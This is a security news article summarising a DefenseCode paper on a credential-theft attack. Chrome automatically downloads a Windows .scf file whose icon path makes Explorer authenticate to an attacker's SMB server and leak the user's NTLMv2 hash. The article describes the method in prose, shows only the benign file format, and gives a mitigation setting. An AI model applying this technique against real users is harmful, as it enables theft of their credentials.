DefenseCode has published a paper that details an attack that leads to Windows credentials theft, affecting the most popular browser in the world, Google Chrome, as well as all Windows versions supporting it.
Here is how it works:
It starts by tricking a Chrome user into downloading a Windows Explorer Shell Command File (.scf) that can be used to trick Windows into an authentication attempt to an attacker-controlled remote SMB server, which designed to capture the victim’s user Microsoft LAN Manager (NTLMv2) password hash.
The hash can be cracked offline or used to impersonate the victim on a service that accepts the same kind of NTLM-based authentication.
Windows Explorer Shell Command File or SCF (.scf) is a lesser known file type going back as far as Windows 98, primarily used as a Show Desktop shortcut. It is basically a text file with two sections, one to determine a command to be run and one to indicate the location of the icon file, such as:
[Shell] Command=2 IconFile=explorer.exe,3 [Taskbar] Command=ToggleDesktop
It can be easily altered to trick Windows into an authentication attempt to a remote SMB server, like below:
The request can be tricked the very moment the download directory is opened in Windows File Explorer. There is no need to click or open the downloaded file since Windows File Explorer will automatically try to retrieve the ‘icon’.
Then, why is Google Chrome’s fault?
By default, Chrome will automatically download files that it deems safe without prompting the user for a download location. And Chrome thinks SCF files are on the safe side of the table so it doesn’t sanitize it as it does with LNK files. As the paper states:
From a security standpoint, this feature is not an ideal behavior but any malicious content that slips through still requires a user to manually open/run the file to do any damage. However, what if the downloaded file requires no user interaction to perform malicious actions? Are there file types that can do that?
The competing browsers like IE, Microsoft Edge, Firefox, and Safari do not allow the automatic download of SCF files.
While Google is working on a solution to fix the issue, DefenseCode suggest making the following change to disable automatic downloads in Google Chrome.
Settings > Show advanced settings, and check the option "Ask where to save each file before downloading" under Downloads section.